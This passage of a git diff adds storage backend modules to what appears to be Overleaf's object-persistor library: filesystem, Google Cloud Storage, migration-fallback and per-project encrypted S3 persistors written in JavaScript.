+ ) + } + + const targetPath = this._getFsPath(location, target) + + try { + await this._ensureDirectoryExists(targetPath) + const tempFilePath = await this._writeStreamToTempFile( + location, + sourceStream, + opts + ) + + try { + await fsPromises.rename(tempFilePath, targetPath) + } finally { + await this._cleanupTempFile(tempFilePath) + } + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to write stream', + { location, target, ifNoneMatch: opts.ifNoneMatch }, + WriteError + ) + } + } + + // opts may be {start: Number, end: Number} + async getObjectStream(location, name, opts = {}) { + if (opts.autoGunzip) { + throw new NotImplementedError( + 'opts.autoGunzip is not supported by FS backend. Configure GCS or S3 backend instead, get in touch with support for further information.' + ) + } + const observer = new PersistorHelper.ObserverStream({ + metric: 'fs.ingress', // ingress to us from disk + bucket: location, + }) + const fsPath = this._getFsPath(location, name) + + try { + opts.fd = await fsPromises.open(fsPath, 'r') + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to open file for streaming', + { location, name, fsPath, opts }, + ReadError + ) + } + + const stream = fs.createReadStream(null, opts) + // Return a PassThrough stream with a minimal interface. It will buffer until the caller starts reading. It will emit errors from the source stream (Stream.pipeline passes errors along). + const pass = new PassThrough() + pipeline(stream, observer, pass).catch(() => {}) + return pass + } + + async getRedirectUrl() { + // not implemented + return null + } + + async getObjectSize(location, filename) { + const fsPath = this._getFsPath(location, filename) + + try { + const stat = await fsPromises.stat(fsPath) + return stat.size + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to stat file', + { location, filename }, + ReadError + ) + } + } + + async getObjectMd5Hash(location, filename) { + const fsPath = this._getFsPath(location, filename) + try { + const stream = fs.createReadStream(fsPath) + const hash = await PersistorHelper.calculateStreamMd5(stream) + return hash + } catch (err) { + throw new ReadError( + 'unable to get md5 hash from file', + { location, filename }, + err + ) + } + } + + async copyObject(location, source, target) { + const sourceFsPath = this._getFsPath(location, source) + const targetFsPath = this._getFsPath(location, target) + + try { + await this._ensureDirectoryExists(targetFsPath) + await fsPromises.copyFile(sourceFsPath, targetFsPath) + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to copy file', + { location, source, target, sourceFsPath, targetFsPath }, + WriteError + ) + } + } + + async deleteObject(location, name) { + const fsPath = this._getFsPath(location, name) + try { + // S3 doesn't give us a 404 when a file wasn't there to be deleted, so we + // should be consistent here as well + await fsPromises.rm(fsPath, { force: true }) + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to delete file', + { location, name, fsPath }, + WriteError + ) + } + } + + async deleteDirectory(location, name) { + const fsPath = this._getFsPath(location, name) + + try { + if (this.useSubdirectories) { + await fsPromises.rm(fsPath, { recursive: true, force: true }) + } else { + const files = await this._listDirectory(fsPath) + for (const file of files) { + await fsPromises.rm(file, { force: true }) + } + } + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to 
delete directory', + { location, name, fsPath }, + WriteError + ) + } + } + + async checkIfObjectExists(location, name) { + const fsPath = this._getFsPath(location, name) + try { + const stat = await fsPromises.stat(fsPath) + return !!stat + } catch (err) { + if (err.code === 'ENOENT') { + return false + } + throw PersistorHelper.wrapError( + err, + 'failed to stat file', + { location, name, fsPath }, + ReadError + ) + } + } + + // note, does not recurse into subdirectories, as we use a flattened directory structure + async directorySize(location, name) { + const fsPath = this._getFsPath(location, name) + let size = 0 + + try { + const files = await this._listDirectory(fsPath) + for (const file of files) { + try { + const stat = await fsPromises.stat(file) + if (stat.isFile()) { + size += stat.size + } + } catch (err) { + // ignore files that may have just been deleted + if (err.code !== 'ENOENT') { + throw err + } + } + } + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to get directory size', + { location, name }, + ReadError + ) + } + + return size + } + + async _writeStreamToTempFile(location, stream, opts = {}) { + const observerOptions = { + metric: 'fs.egress', // egress from us to disk + bucket: location, + } + const observer = new PersistorHelper.ObserverStream(observerOptions) + + const tempDirPath = await fsPromises.mkdtemp(Path.join(location, 'tmp-')) + const tempFilePath = Path.join(tempDirPath, 'uploaded-file') + + const transforms = [observer] + let md5Observer + if (opts.sourceMd5) { + md5Observer = createMd5Observer() + transforms.push(md5Observer.transform) + } + + try { + const writeStream = fs.createWriteStream(tempFilePath) + await pipeline(stream, ...transforms, writeStream) + } catch (err) { + await this._cleanupTempFile(tempFilePath) + throw new WriteError( + 'problem writing temp file locally', + { tempFilePath }, + err + ) + } + + if (opts.sourceMd5) { + const actualMd5 = md5Observer.hash.digest('hex') + if (actualMd5 !== opts.sourceMd5) { + await this._cleanupTempFile(tempFilePath) + throw new WriteError('md5 hash mismatch', { + expectedMd5: opts.sourceMd5, + actualMd5, + }) + } + } + + return tempFilePath + } + + async _cleanupTempFile(tempFilePath) { + const dirPath = Path.dirname(tempFilePath) + await fsPromises.rm(dirPath, { force: true, recursive: true }) + } + + _getFsPath(location, key) { + key = key.replace(/\/$/, '') + if (!this.useSubdirectories) { + key = key.replace(/\//g, '_') + } + return Path.join(location, key) + } + + async _listDirectory(path) { + if (this.useSubdirectories) { + return await glob(Path.join(path, '**')) + } else { + return await glob(`${path}_*`) + } + } + + async _ensureDirectoryExists(path) { + await fsPromises.mkdir(Path.dirname(path), { recursive: true }) + } +} + +function createMd5Observer() { + const hash = crypto.createHash('md5') + + async function* transform(chunks) { + for await (const chunk of chunks) { + hash.update(chunk) + yield chunk + } + } + + return { hash, transform } +} diff --git a/libraries/object-persistor/src/GcsPersistor.js b/libraries/object-persistor/src/GcsPersistor.js new file mode 100644 index 0000000..0485373 --- /dev/null +++ b/libraries/object-persistor/src/GcsPersistor.js @@ -0,0 +1,354 @@ +const fs = require('node:fs') +const { pipeline } = require('node:stream/promises') +const { PassThrough } = require('node:stream') +const { Storage, IdempotencyStrategy } = require('@google-cloud/storage') +const { + WriteError, + ReadError, + NotFoundError, + NotImplementedError, +} = 
require('./Errors') +const asyncPool = require('tiny-async-pool') +const AbstractPersistor = require('./AbstractPersistor') +const PersistorHelper = require('./PersistorHelper') +const Logger = require('@overleaf/logger') +const zlib = require('node:zlib') + +module.exports = class GcsPersistor extends AbstractPersistor { + constructor(settings) { + if (settings.storageClass) { + throw new NotImplementedError( + 'Use default bucket class for GCS instead of settings.storageClass' + ) + } + + super() + this.settings = settings + + // endpoint settings will be null by default except for tests + // that's OK - GCS uses the locally-configured service account by default + const storageOptions = {} + if (this.settings.endpoint) { + storageOptions.projectId = this.settings.endpoint.projectId + storageOptions.apiEndpoint = this.settings.endpoint.apiEndpoint + } + storageOptions.retryOptions = { ...this.settings.retryOptions } + if (storageOptions.retryOptions) { + if (storageOptions.retryOptions.idempotencyStrategy) { + const value = + IdempotencyStrategy[this.settings.retryOptions.idempotencyStrategy] + if (value === undefined) { + throw new Error( + 'Unrecognised value for retryOptions.idempotencyStrategy' + ) + } + Logger.info( + `Setting retryOptions.idempotencyStrategy to ${storageOptions.retryOptions.idempotencyStrategy} (${value})` + ) + storageOptions.retryOptions.idempotencyStrategy = value + } + } + + this.storage = new Storage(storageOptions) + } + + async sendFile(bucketName, key, fsPath) { + return await this.sendStream(bucketName, key, fs.createReadStream(fsPath)) + } + + async sendStream(bucketName, key, readStream, opts = {}) { + try { + const observeOptions = { + metric: 'gcs.egress', // egress from us to GCS + bucket: bucketName, + } + + let sourceMd5 = opts.sourceMd5 + if (!sourceMd5) { + // if there is no supplied md5 hash, we calculate the hash as the data passes through + observeOptions.hash = 'md5' + } + + const observer = new PersistorHelper.ObserverStream(observeOptions) + + const writeOptions = { + // disabling of resumable uploads is recommended by Google: + resumable: false, + } + + if (sourceMd5) { + writeOptions.validation = 'md5' + writeOptions.metadata = writeOptions.metadata || {} + writeOptions.metadata.md5Hash = PersistorHelper.hexToBase64(sourceMd5) + } + if (opts.contentType) { + writeOptions.metadata = writeOptions.metadata || {} + writeOptions.metadata.contentType = opts.contentType + } + if (opts.contentEncoding) { + writeOptions.metadata = writeOptions.metadata || {} + writeOptions.metadata.contentEncoding = opts.contentEncoding + } + const fileOptions = {} + if (opts.ifNoneMatch === '*') { + fileOptions.generation = 0 + } + + const uploadStream = this.storage + .bucket(bucketName) + .file(key, fileOptions) + .createWriteStream(writeOptions) + + await pipeline(readStream, observer, uploadStream) + + // if we didn't have an md5 hash, we should compare our computed one with Google's + // as we couldn't tell GCS about it beforehand + if (!sourceMd5) { + sourceMd5 = observer.getHash() + // throws on mismatch + await PersistorHelper.verifyMd5(this, bucketName, key, sourceMd5) + } + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'upload to GCS failed', + { bucketName, key, ifNoneMatch: opts.ifNoneMatch }, + WriteError + ) + } + } + + async getObjectStream(bucketName, key, opts = {}) { + const observer = new PersistorHelper.ObserverStream({ + metric: 'gcs.ingress', // ingress to us from GCS + bucket: bucketName, + }) + const stream = this.storage + 
.bucket(bucketName) + .file(key) + .createReadStream({ decompress: false, ...opts }) + + let contentEncoding + try { + await new Promise((resolve, reject) => { + stream.on('response', res => { + switch (res.statusCode) { + case 200: // full response + case 206: // partial response + contentEncoding = res.headers['content-encoding'] + return resolve() + case 404: + return reject(new NotFoundError()) + default: + return reject(new Error('non success status: ' + res.statusCode)) + } + }) + stream.on('error', reject) + stream.read(0) // kick off request + }) + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'error reading file from GCS', + { bucketName, key, opts }, + ReadError + ) + } + // Return a PassThrough stream with a minimal interface. It will buffer until the caller starts reading. It will emit errors from the source stream (Stream.pipeline passes errors along). + const pass = new PassThrough() + const transformer = [] + if (contentEncoding === 'gzip' && opts.autoGunzip) { + transformer.push(zlib.createGunzip()) + } + pipeline(stream, observer, ...transformer, pass).catch(() => {}) + return pass + } + + async getRedirectUrl(bucketName, key) { + if (this.settings.unsignedUrls) { + // Construct a direct URL to the object download endpoint + // (see https://cloud.google.com/storage/docs/request-endpoints#json-api) + const apiEndpoint = + this.settings.endpoint.apiEndpoint || 'https://storage.googleapis.com' + return `${apiEndpoint}/download/storage/v1/b/${bucketName}/o/${key}?alt=media` + } + try { + const [url] = await this.storage + .bucket(bucketName) + .file(key) + .getSignedUrl({ + action: 'read', + expires: Date.now() + this.settings.signedUrlExpiryInMs, + }) + return url + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'error generating signed url for GCS file', + { bucketName, key }, + ReadError + ) + } + } + + async getObjectSize(bucketName, key) { + try { + const [metadata] = await this.storage + .bucket(bucketName) + .file(key) + .getMetadata() + return parseInt(metadata.size, 10) + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'error getting size of GCS object', + { bucketName, key }, + ReadError + ) + } + } + + async getObjectMd5Hash(bucketName, key) { + try { + const [metadata] = await this.storage + .bucket(bucketName) + .file(key) + .getMetadata() + return PersistorHelper.base64ToHex(metadata.md5Hash) + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'error getting hash of GCS object', + { bucketName, key }, + ReadError + ) + } + } + + async deleteObject(bucketName, key) { + try { + const file = this.storage.bucket(bucketName).file(key) + + if (this.settings.deletedBucketSuffix) { + await file.copy( + this.storage + .bucket(`${bucketName}${this.settings.deletedBucketSuffix}`) + .file(`${key}-${new Date().toISOString()}`) + ) + } + if (this.settings.unlockBeforeDelete) { + await file.setMetadata({ eventBasedHold: false }) + } + await file.delete() + } catch (err) { + // ignore 404s: it's fine if the file doesn't exist. 
+ if (err.code === 404) { + return + } + throw PersistorHelper.wrapError( + err, + 'error deleting GCS object', + { bucketName, key }, + WriteError + ) + } + } + + async deleteDirectory(bucketName, key) { + const prefix = ensurePrefixIsDirectory(key) + let query = { prefix, autoPaginate: false } + do { + try { + const [files, nextQuery] = await this.storage + .bucket(bucketName) + .getFiles(query) + // iterate over paginated results using the nextQuery returned by getFiles + query = nextQuery + if (Array.isArray(files) && files.length > 0) { + await asyncPool( + this.settings.deleteConcurrency, + files, + async file => { + await this.deleteObject(bucketName, file.name) + } + ) + } + } catch (err) { + const error = PersistorHelper.wrapError( + err, + 'failed to delete directory in GCS', + { bucketName, key }, + WriteError + ) + if (error instanceof NotFoundError) { + return + } + throw error + } + } while (query) + } + + async directorySize(bucketName, key) { + let files + const prefix = ensurePrefixIsDirectory(key) + + try { + const [response] = await this.storage + .bucket(bucketName) + .getFiles({ prefix }) + files = response + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to list objects in GCS', + { bucketName, key }, + ReadError + ) + } + + return files.reduce( + (acc, file) => parseInt(file.metadata.size, 10) + acc, + 0 + ) + } + + async checkIfObjectExists(bucketName, key) { + try { + const [response] = await this.storage + .bucket(bucketName) + .file(key) + .exists() + return response + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'error checking if file exists in GCS', + { bucketName, key }, + ReadError + ) + } + } + + async copyObject(bucketName, sourceKey, destKey) { + try { + const src = this.storage.bucket(bucketName).file(sourceKey) + const dest = this.storage.bucket(bucketName).file(destKey) + await src.copy(dest) + } catch (err) { + // fake-gcs-server has a bug that returns an invalid response when the file does not exist + if (err.message === 'Cannot parse response as JSON: not found\n') { + err.code = 404 + } + throw PersistorHelper.wrapError( + err, + 'failed to copy file in GCS', + { bucketName, sourceKey, destKey }, + WriteError + ) + } + } +} + +function ensurePrefixIsDirectory(key) { + return key === '' || key.endsWith('/') ? key : `${key}/` +} diff --git a/libraries/object-persistor/src/MigrationPersistor.js b/libraries/object-persistor/src/MigrationPersistor.js new file mode 100644 index 0000000..0cb665f --- /dev/null +++ b/libraries/object-persistor/src/MigrationPersistor.js @@ -0,0 +1,267 @@ +const AbstractPersistor = require('./AbstractPersistor') +const Logger = require('@overleaf/logger') +const Metrics = require('@overleaf/metrics') +const Stream = require('node:stream') +const { pipeline } = require('node:stream/promises') +const { NotFoundError, WriteError } = require('./Errors') + +// Persistor that wraps two other persistors. Talks to the 'primary' by default, +// but will fall back to an older persistor in the case of a not-found error. +// If `Settings.fallback.copyOnMiss` is set, this will copy files from the fallback +// to the primary, in the event that they are missing. +// +// It is unlikely that the bucket/location name will be the same on the fallback +// as the primary. The bucket names should be overridden in `Settings.fallback.buckets` +// e.g. 
+// Settings.fallback.buckets = { +// myBucketOnS3: 'myBucketOnGCS' +// } + +module.exports = class MigrationPersistor extends AbstractPersistor { + /** + * @param {AbstractPersistor} primaryPersistor + * @param {AbstractPersistor} fallbackPersistor + * @param settings + */ + constructor(primaryPersistor, fallbackPersistor, settings) { + super() + + /** + * @type {AbstractPersistor} + */ + this.primaryPersistor = primaryPersistor + /** + * @type {AbstractPersistor} + */ + this.fallbackPersistor = fallbackPersistor + this.settings = settings + } + + async sendFile(...args) { + return await this.primaryPersistor.sendFile(...args) + } + + async sendStream(...args) { + return await this.primaryPersistor.sendStream(...args) + } + + async getRedirectUrl(...args) { + return await this.primaryPersistor.getRedirectUrl(...args) + } + + async getObjectMd5Hash(...args) { + return await this._runWithFallback('getObjectMd5Hash', ...args) + } + + async checkIfObjectExists(...args) { + return await this._runWithFallback('checkIfObjectExists', ...args) + } + + async getObjectSize(...args) { + return await this._runWithFallback('getObjectSize', ...args) + } + + async directorySize(...args) { + return await this._runWithFallback('directorySize', ...args) + } + + async deleteObject(...args) { + return await this._runOnBoth('deleteObject', ...args) + } + + async deleteDirectory(...args) { + return await this._runOnBoth('deleteDirectory', ...args) + } + + async getObjectStream(bucket, key, opts = {}) { + const shouldCopy = this.settings.copyOnMiss && !opts.start && !opts.end + + try { + return await this.primaryPersistor.getObjectStream(bucket, key, opts) + } catch (err) { + if (err instanceof NotFoundError) { + const fallbackBucket = this._getFallbackBucket(bucket) + const fallbackStream = await this.fallbackPersistor.getObjectStream( + fallbackBucket, + key, + opts + ) + // tee the stream to the client, and as a copy to the primary (if necessary) + // start listening on both straight away so that we don't consume bytes + // in one place before the other + const returnStream = new Stream.PassThrough() + pipeline(fallbackStream, returnStream).catch(error => { + Logger.warn({ error }, 'failed to copy object from fallback') + }) + + if (shouldCopy) { + const copyStream = new Stream.PassThrough() + pipeline(fallbackStream, copyStream).catch(error => { + Logger.warn({ error }, 'failed to copy object from fallback') + }) + + this._copyStreamFromFallbackAndVerify( + copyStream, + fallbackBucket, + bucket, + key, + key + ).catch(error => { + Logger.warn({ error }, 'failed to copy file from fallback') + }) + } + return returnStream + } + throw err + } + } + + async copyObject(bucket, sourceKey, destKey) { + try { + return await this.primaryPersistor.copyObject(bucket, sourceKey, destKey) + } catch (err) { + if (err instanceof NotFoundError) { + const fallbackBucket = this._getFallbackBucket(bucket) + const fallbackStream = await this.fallbackPersistor.getObjectStream( + fallbackBucket, + sourceKey, + {} + ) + + const copyStream = new Stream.PassThrough() + pipeline(fallbackStream, copyStream).catch(error => { + Logger.warn({ error }, 'failed to copy object from fallback') + }) + + if (this.settings.copyOnMiss) { + const missStream = new Stream.PassThrough() + pipeline(fallbackStream, missStream).catch(error => { + Logger.warn({ error }, 'failed to copy object from fallback') + }) + + // copy from sourceKey -> sourceKey + this._copyStreamFromFallbackAndVerify( + missStream, + fallbackBucket, + bucket, + sourceKey, + 
sourceKey + ).catch(() => { + // swallow errors, as this runs in the background and will log a warning + }) + } + // copy from sourceKey -> destKey + return await this._copyStreamFromFallbackAndVerify( + copyStream, + fallbackBucket, + bucket, + sourceKey, + destKey + ) + } + throw err + } + } + + async _copyStreamFromFallbackAndVerify( + stream, + sourceBucket, + destBucket, + sourceKey, + destKey + ) { + try { + let sourceMd5 + try { + sourceMd5 = await this.fallbackPersistor.getObjectMd5Hash( + sourceBucket, + sourceKey + ) + } catch (err) { + Logger.warn(err, 'error getting md5 hash from fallback persistor') + } + + await this.primaryPersistor.sendStream(destBucket, destKey, stream, { + sourceMd5, + }) + } catch (err) { + const error = new WriteError( + 'unable to copy file to destination persistor', + { + sourceBucket, + destBucket, + sourceKey, + destKey, + }, + err + ) + Metrics.inc('fallback.copy.failure') + + try { + await this.primaryPersistor.deleteObject(destBucket, destKey) + } catch (err) { + error.info.cleanupError = new WriteError( + 'unable to clean up destination copy artifact', + { + destBucket, + destKey, + }, + err + ) + } + throw error + } + } + + _getFallbackBucket(bucket) { + return (this.settings.buckets && this.settings.buckets[bucket]) || bucket + } + + async _runOnBoth(methodName, bucket, ...moreArgs) { + const fallbackBucket = this._getFallbackBucket(bucket) + + await Promise.all([ + this.primaryPersistor[methodName](bucket, ...moreArgs), + this.fallbackPersistor[methodName](fallbackBucket, ...moreArgs), + ]) + } + + /** + * @param {keyof AbstractPersistor} methodName + * @param bucket + * @param key + * @param moreArgs + */ + async _runWithFallback(methodName, bucket, key, ...moreArgs) { + try { + return await this.primaryPersistor[methodName](bucket, key, ...moreArgs) + } catch (err) { + if (err instanceof NotFoundError) { + const fallbackBucket = this._getFallbackBucket(bucket) + if (this.settings.copyOnMiss) { + const fallbackStream = await this.fallbackPersistor.getObjectStream( + fallbackBucket, + key, + {} + ) + // run in background + this._copyStreamFromFallbackAndVerify( + fallbackStream, + fallbackBucket, + bucket, + key, + key + ).catch(err => { + Logger.warn({ err }, 'failed to copy file from fallback') + }) + } + return await this.fallbackPersistor[methodName]( + fallbackBucket, + key, + ...moreArgs + ) + } + throw err + } + } +} diff --git a/libraries/object-persistor/src/PerProjectEncryptedS3Persistor.js b/libraries/object-persistor/src/PerProjectEncryptedS3Persistor.js new file mode 100644 index 0000000..7bd4bb9 --- /dev/null +++ b/libraries/object-persistor/src/PerProjectEncryptedS3Persistor.js @@ -0,0 +1,469 @@ +// @ts-check +const Crypto = require('node:crypto') +const Stream = require('node:stream') +const fs = require('node:fs') +const { promisify } = require('node:util') +const { WritableBuffer } = require('@overleaf/stream-utils') +const { S3Persistor, SSECOptions } = require('./S3Persistor.js') +const { + AlreadyWrittenError, + NoKEKMatchedError, + NotFoundError, + NotImplementedError, + ReadError, +} = require('./Errors') +const logger = require('@overleaf/logger') +const Path = require('node:path') + +const generateKey = promisify(Crypto.generateKey) +const hkdf = promisify(Crypto.hkdf) + +const AES256_KEY_LENGTH = 32 + +/** + * @typedef {import('aws-sdk').AWSError} AWSError + */ + +/** + * @typedef {Object} Settings + * @property {boolean} automaticallyRotateDEKEncryption + * @property {string} dataEncryptionKeyBucketName + * 
@property {boolean} ignoreErrorsFromDEKReEncryption + * @property {(bucketName: string, path: string) => string} pathToProjectFolder + * @property {() => Promise>} getRootKeyEncryptionKeys + */ + +/** + * Helper function to make TS happy when accessing error properties + * AWSError is not an actual class, so we cannot use instanceof. + * @param {any} err + * @return {err is AWSError} + */ +function isAWSError(err) { + return !!err +} + +/** + * @param {any} err + * @return {boolean} + */ +function isForbiddenError(err) { + if (!err || !(err instanceof ReadError || err instanceof NotFoundError)) { + return false + } + const cause = err.cause + if (!isAWSError(cause)) return false + return cause.statusCode === 403 +} + +class RootKeyEncryptionKey { + /** @type {Buffer} */ + #keyEncryptionKey + /** @type {Buffer} */ + #salt + + /** + * @param {Buffer} keyEncryptionKey + * @param {Buffer} salt + */ + constructor(keyEncryptionKey, salt) { + if (keyEncryptionKey.byteLength !== AES256_KEY_LENGTH) { + throw new Error(`kek is not ${AES256_KEY_LENGTH} bytes long`) + } + this.#keyEncryptionKey = keyEncryptionKey + this.#salt = salt + } + + /** + * @param {string} prefix + * @return {Promise} + */ + async forProject(prefix) { + return new SSECOptions( + Buffer.from( + await hkdf( + 'sha256', + this.#keyEncryptionKey, + this.#salt, + prefix, + AES256_KEY_LENGTH + ) + ) + ) + } +} + +class PerProjectEncryptedS3Persistor extends S3Persistor { + /** @type {Settings} */ + #settings + /** @type {Promise>} */ + #availableKeyEncryptionKeysPromise + + /** + * @param {Settings} settings + */ + constructor(settings) { + if (!settings.dataEncryptionKeyBucketName) { + throw new Error('settings.dataEncryptionKeyBucketName is missing') + } + super(settings) + this.#settings = settings + this.#availableKeyEncryptionKeysPromise = settings + .getRootKeyEncryptionKeys() + .then(rootKEKs => { + if (rootKEKs.length === 0) throw new Error('no root kek provided') + return rootKEKs + }) + } + + async ensureKeyEncryptionKeysLoaded() { + await this.#availableKeyEncryptionKeysPromise + } + + /** + * @param {string} bucketName + * @param {string} path + * @return {{dekPath: string, projectFolder: string}} + */ + #buildProjectPaths(bucketName, path) { + const projectFolder = this.#settings.pathToProjectFolder(bucketName, path) + const dekPath = Path.join(projectFolder, 'dek') + return { projectFolder, dekPath } + } + + /** + * @param {string} projectFolder + * @return {Promise} + */ + async #getCurrentKeyEncryptionKey(projectFolder) { + const [currentRootKEK] = await this.#availableKeyEncryptionKeysPromise + return await currentRootKEK.forProject(projectFolder) + } + + /** + * @param {string} bucketName + * @param {string} path + */ + async getDataEncryptionKeySize(bucketName, path) { + const { projectFolder, dekPath } = this.#buildProjectPaths(bucketName, path) + for (const rootKEK of await this.#availableKeyEncryptionKeysPromise) { + const ssecOptions = await rootKEK.forProject(projectFolder) + try { + return await super.getObjectSize( + this.#settings.dataEncryptionKeyBucketName, + dekPath, + { ssecOptions } + ) + } catch (err) { + if (isForbiddenError(err)) continue + throw err + } + } + throw new NoKEKMatchedError('no kek matched') + } + + /** + * @param {string} bucketName + * @param {string} path + * @return {Promise} + */ + async forProject(bucketName, path) { + return new CachedPerProjectEncryptedS3Persistor( + this, + await this.#getDataEncryptionKeyOptions(bucketName, path) + ) + } + + /** + * @param {string} 
bucketName + * @param {string} path + * @return {Promise} + */ + async forProjectRO(bucketName, path) { + return new CachedPerProjectEncryptedS3Persistor( + this, + await this.#getExistingDataEncryptionKeyOptions(bucketName, path) + ) + } + + /** + * @param {string} bucketName + * @param {string} path + * @return {Promise} + */ + async generateDataEncryptionKey(bucketName, path) { + return new CachedPerProjectEncryptedS3Persistor( + this, + await this.#generateDataEncryptionKeyOptions(bucketName, path) + ) + } + + /** + * @param {string} bucketName + * @param {string} path + * @return {Promise} + */ + async #generateDataEncryptionKeyOptions(bucketName, path) { + const dataEncryptionKey = ( + await generateKey('aes', { length: 256 }) + ).export() + const { projectFolder, dekPath } = this.#buildProjectPaths(bucketName, path) + await super.sendStream( + this.#settings.dataEncryptionKeyBucketName, + dekPath, + Stream.Readable.from([dataEncryptionKey]), + { + // Do not overwrite any objects if already created + ifNoneMatch: '*', + ssecOptions: await this.#getCurrentKeyEncryptionKey(projectFolder), + contentLength: 32, + } + ) + return new SSECOptions(dataEncryptionKey) + } + + /** + * @param {string} bucketName + * @param {string} path + * @return {Promise} + */ + async #getExistingDataEncryptionKeyOptions(bucketName, path) { + const { projectFolder, dekPath } = this.#buildProjectPaths(bucketName, path) + let res + let kekIndex = 0 + for (const rootKEK of await this.#availableKeyEncryptionKeysPromise) { + const ssecOptions = await rootKEK.forProject(projectFolder) + try { + res = await super.getObjectStream( + this.#settings.dataEncryptionKeyBucketName, + dekPath, + { ssecOptions } + ) + break + } catch (err) { + if (isForbiddenError(err)) { + kekIndex++ + continue + } + throw err + } + } + if (!res) throw new NoKEKMatchedError('no kek matched') + const buf = new WritableBuffer() + await Stream.promises.pipeline(res, buf) + + if (kekIndex !== 0 && this.#settings.automaticallyRotateDEKEncryption) { + const ssecOptions = await this.#getCurrentKeyEncryptionKey(projectFolder) + try { + await super.sendStream( + this.#settings.dataEncryptionKeyBucketName, + dekPath, + Stream.Readable.from([buf.getContents()]), + { ssecOptions } + ) + } catch (err) { + if (this.#settings.ignoreErrorsFromDEKReEncryption) { + logger.warn({ err, dekPath }, 'failed to persist re-encrypted DEK') + } else { + throw err + } + } + } + + return new SSECOptions(buf.getContents()) + } + + /** + * @param {string} bucketName + * @param {string} path + * @return {Promise} + */ + async #getDataEncryptionKeyOptions(bucketName, path) { + try { + return await this.#getExistingDataEncryptionKeyOptions(bucketName, path) + } catch (err) { + if (err instanceof NotFoundError) { + try { + return await this.#generateDataEncryptionKeyOptions(bucketName, path) + } catch (err2) { + if (err2 instanceof AlreadyWrittenError) { + // Concurrent initial write + return await this.#getExistingDataEncryptionKeyOptions( + bucketName, + path + ) + } + throw err2 + } + } + throw err + } + } + + async sendStream(bucketName, path, sourceStream, opts = {}) { + const ssecOptions = + opts.ssecOptions || + (await this.#getDataEncryptionKeyOptions(bucketName, path)) + return await super.sendStream(bucketName, path, sourceStream, { + ...opts, + ssecOptions, + }) + } + + async getObjectStream(bucketName, path, opts = {}) { + const ssecOptions = + opts.ssecOptions || + (await this.#getExistingDataEncryptionKeyOptions(bucketName, path)) + return await 
super.getObjectStream(bucketName, path, { + ...opts, + ssecOptions, + }) + } + + async getObjectSize(bucketName, path, opts = {}) { + const ssecOptions = + opts.ssecOptions || + (await this.#getExistingDataEncryptionKeyOptions(bucketName, path)) + return await super.getObjectSize(bucketName, path, { ...opts, ssecOptions }) + } + + async getObjectStorageClass(bucketName, path, opts = {}) { + const ssecOptions = + opts.ssecOptions || + (await this.#getExistingDataEncryptionKeyOptions(bucketName, path)) + return await super.getObjectStorageClass(bucketName, path, { + ...opts, + ssecOptions, + }) + } + + async directorySize(bucketName, path, continuationToken) { + // Note: Listing a bucket does not require SSE-C credentials. + return await super.directorySize(bucketName, path, continuationToken) + } + + async deleteDirectory(bucketName, path, continuationToken) { + // Let [Settings.pathToProjectFolder] validate the project path before deleting things. + const { projectFolder, dekPath } = this.#buildProjectPaths(bucketName, path) + // Note: Listing/Deleting a prefix does not require SSE-C credentials. + await super.deleteDirectory(bucketName, path, continuationToken) + if (projectFolder === path) { + await super.deleteObject( + this.#settings.dataEncryptionKeyBucketName, + dekPath + ) + } + } + + async getObjectMd5Hash(bucketName, path, opts = {}) { + // The ETag in object metadata is not the MD5 content hash, skip the HEAD request. + opts = { ...opts, etagIsNotMD5: true } + return await super.getObjectMd5Hash(bucketName, path, opts) + } + + async copyObject(bucketName, sourcePath, destinationPath, opts = {}) { + const ssecOptions = + opts.ssecOptions || + (await this.#getDataEncryptionKeyOptions(bucketName, destinationPath)) + const ssecSrcOptions = + opts.ssecSrcOptions || + (await this.#getExistingDataEncryptionKeyOptions(bucketName, sourcePath)) + return await super.copyObject(bucketName, sourcePath, destinationPath, { + ...opts, + ssecOptions, + ssecSrcOptions, + }) + } + + /** + * @param {string} bucketName + * @param {string} path + * @return {Promise} + */ + async getRedirectUrl(bucketName, path) { + throw new NotImplementedError('signed links are not supported with SSE-C') + } +} + +/** + * Helper class for batch updates to avoid repeated fetching of the project path. + * + * A general "cache" for project keys is another alternative. For now, use a helper class. 
+ */ +class CachedPerProjectEncryptedS3Persistor { + /** @type SSECOptions */ + #projectKeyOptions + /** @type PerProjectEncryptedS3Persistor */ + #parent + + /** + * @param {PerProjectEncryptedS3Persistor} parent + * @param {SSECOptions} projectKeyOptions + */ + constructor(parent, projectKeyOptions) { + this.#parent = parent + this.#projectKeyOptions = projectKeyOptions + } + + /** + * @param {string} bucketName + * @param {string} path + * @param {string} fsPath + */ + async sendFile(bucketName, path, fsPath) { + return await this.sendStream(bucketName, path, fs.createReadStream(fsPath)) + } + + /** + * + * @param {string} bucketName + * @param {string} path + * @return {Promise} + */ + async getObjectSize(bucketName, path) { + return await this.#parent.getObjectSize(bucketName, path) + } + + /** + * @param {string} bucketName + * @param {string} path + * @param {NodeJS.ReadableStream} sourceStream + * @param {Object} opts + * @param {string} [opts.contentType] + * @param {string} [opts.contentEncoding] + * @param {number} [opts.contentLength] + * @param {'*'} [opts.ifNoneMatch] + * @param {SSECOptions} [opts.ssecOptions] + * @param {string} [opts.sourceMd5] + * @return {Promise} + */ + async sendStream(bucketName, path, sourceStream, opts = {}) { + return await this.#parent.sendStream(bucketName, path, sourceStream, { + ...opts, + ssecOptions: this.#projectKeyOptions, + }) + } + + /** + * @param {string} bucketName + * @param {string} path + * @param {Object} opts + * @param {number} [opts.start] + * @param {number} [opts.end] + * @param {boolean} [opts.autoGunzip] + * @param {SSECOptions} [opts.ssecOptions] + * @return {Promise} + */ + async getObjectStream(bucketName, path, opts = {}) { + return await this.#parent.getObjectStream(bucketName, path, { + ...opts, + ssecOptions: this.#projectKeyOptions, + }) + } +} + +module.exports = { + 